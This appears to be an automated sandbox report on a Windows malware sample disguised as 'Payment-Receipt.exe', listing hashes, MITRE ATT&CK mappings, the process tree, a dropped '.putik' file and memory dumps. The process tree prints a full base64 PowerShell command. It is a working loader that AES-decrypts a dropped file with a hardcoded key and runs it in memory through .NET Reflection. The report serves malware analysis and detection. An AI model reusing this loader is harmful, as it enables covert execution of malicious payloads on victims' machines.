bf69d7e6dc53d7406f9ca42a77aab58d4fab67d8c0778f71efc77a9fb653e4c9

General

Target

Payment-Receipt.exe
Size

835KB
MD5

ec6570ba3ecd5ce8ec00e775eebe3872
SHA1

e449ffc0d43aad5dea985ddb2ae506a28e548f88
SHA256

bf69d7e6dc53d7406f9ca42a77aab58d4fab67d8c0778f71efc77a9fb653e4c9
SHA512

9cefd277e30b232bc661826cf0361d8b0f028378002112b114123ad92317cc610425add500a6858367de7aa60599092d9641eb0af1b58fd16850a970fd6001f8
SSDEEP

12288:Ftzd+m39dkAf5YSyBThO6QEJ7KJajLYDcks2qIUtd88ZAFfhAR/e4Fkf:FthkszyqFYKqYHMIN8iFZARG4U

Score

3^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
324	powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
324	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	324	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2912 wrote to memory of 324	2912	Payment-Receipt.exe	29
PID 2912 wrote to memory of 324	2912	Payment-Receipt.exe	29
PID 2912 wrote to memory of 324	2912	Payment-Receipt.exe	29

C:\Users\Admin\AppData\Local\Temp\Payment-Receipt.exe
"C:\Users\Admin\AppData\Local\Temp\Payment-Receipt.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2912
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgANQAwADAAMAApAAoACgAkAFQAZQBtAHAARABpAHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAKACQAUABhAHQAdABlAHIAbgAgAD0AIAAnAGYAaQBsAGUALQAqAC4AcAB1AHQAaQBrACcACgAkAEwAYQB0AGUAcwB0AEYAaQBsAGUAIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAVABlAG0AcABEAGkAcgAgAC0ARgBpAGwAdABlAHIAIAAkAFAAYQB0AHQAZQByAG4AIAB8ACAAUwBvAHIAdAAtAE8AYgBqAGUAYwB0ACAATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQAgAC0ARABlAHMAYwBlAG4AZABpAG4AZwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBGAGkAcgBzAHQAIAAxAAoACgBmAHUAbgBjAHQAaQBvAG4AIADjicZbIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAKWUGVMsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkABFUz5EsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAHBlbmMKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAKBSxltoViAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJACgUsZbaFYuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJACgUsZbaFYuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFAASwBDAFMANwAKAAoAIAAgACAAIAAkAOOJxltoViAAPQAgACQAoFLGW2hWLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQApZQZUywAIAAkABFUz5EpAAoAIAAgACAAIAAkAOOJxltwZW5jIAA9ACAAJADjicZbaFYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAHBlbmMsACAAMAAsACAAJABwZW5jLgBMAGUAbgBnAHQAaAApAAoACQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkAOOJxltwZW5jCgB9AAoACgAkAKWUGVMgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAyADAALAAgADAAeAA0AEQALAAgADAAeAA0ADcALAAgADAAeAA4AEUALAAgADAAeABCADEALAAgADAAeABGAEQALAAgADAAeAAwADcALAAgADAAeABGAEYALAAgADAAeABFADYALAAgADAAeABFADgALAAgADAAeABFADUALAAgADAAeABFAEEALAAgADAAeAAwAEQALAAgADAAeABEAEEALAAgADAAeABBADIALAAgADAAeAA0ADMALAAgADAAeABCAEYALAAgADAAeAAzAEUALAAgADAAeAAwADAALAAgADAAeABDAEIALAAgADAAeAA2ADAALAAgADAAeABFADEALAAgADAAeAAwADgALAAgADAAeAA2AEQALAAgADAAeAA2ADMALAAgADAAeAA4AEQALAAgADAAeABEADUALAAgADAAeAAzAEYALAAgADAAeAAwADgALAAgADAAeAA4ADMALAAgADAAeAAyADAALAAgADAAeABFAEYAKQAKACQAEVTPkSAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4ADIAMgAsACAAMAB4ADQANgAsACAAMAB4AEIAQwAsACAAMAB4AEMANAAsACAAMAB4AEIARAAsACAAMAB4AEQANwAsACAAMAB4ADQAMgAsACAAMAB4AEIARQAsACAAMAB4ADIANQAsACAAMAB4AEEAQwAsACAAMAB4ADgAQgAsACAAMAB4ADEANwAsACAAMAB4ADkANAAsACAAMAB4AEYANwAsACAAMAB4AEMARAAsACAAMAB4ADAANQApAAoACgBpAGYAIAAoACQATABhAHQAZQBzAHQARgBpAGwAZQAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAIdl9k7vjYRfIAA9ACAAJABMAGEAdABlAHMAdABGAGkAbABlAC4ARgB1AGwAbABOAGEAbQBlAAoAIAAgACAAIAAkAKBSxltXW4KCIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAIdl9k7vjYRfKQA7AAoAIAAgACAAIAAkAOOJxluFUblbIAA9ACAA44nGWyAALQCllBlTIAAkAKWUGVMgAC0AEVTPkSAAJAARVM+RIAAtAHBlbmMgACQAoFLGW1dbgoIKAAoAIAAgACAAIAAkAAt6j17GliAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQA44nGW4VRuVspACkAOwAKACAAIAAgACAAJABlUeNTuXAgAD0AIAAkAAt6j17Gli4ARQBuAHQAcgB5AFAAbwBpAG4AdAA7AAoAIAAgACAAIAAkAGVR41O5cC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:324

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\file-21260.putik

Filesize
20KB

MD5
31accf839a08c967e785dc47af7b5cf4

SHA1
c42bd4abbb1efe684b046ad1c9a061e1ef08f89c

SHA256
71d58721507c97f0cfcfd2c03d396dc0de2c108f6b0d2dd2181e90b3548501a5

SHA512
55d3b4726cec11c3a74a9c93184e971efdeeb6851f815a9115aba874783cf4dfa6239bb1d5fc029b269a0551eec5e7c295c4c2f626a75438981b7fe5a85ba724

Download Submit
memory/324-11-0x000007FEF53A0000-0x000007FEF5D3D000-memory.dmp

Filesize
9.6MB

Download
memory/324-10-0x000007FEF53A0000-0x000007FEF5D3D000-memory.dmp

Filesize
9.6MB

Download
memory/324-9-0x000007FEF53A0000-0x000007FEF5D3D000-memory.dmp

Filesize
9.6MB

Download
memory/324-8-0x000007FEF53A0000-0x000007FEF5D3D000-memory.dmp

Filesize
9.6MB

Download
memory/324-7-0x0000000001ED0000-0x0000000001ED8000-memory.dmp

Filesize
32KB

Download
memory/324-6-0x000000001B260000-0x000000001B542000-memory.dmp

Filesize
2.9MB

Download
memory/324-5-0x000007FEF565E000-0x000007FEF565F000-memory.dmp

Filesize
4KB

Download
memory/324-13-0x00000000027B0000-0x00000000027BA000-memory.dmp

Filesize
40KB

Download
memory/324-14-0x000007FEF53A0000-0x000007FEF5D3D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing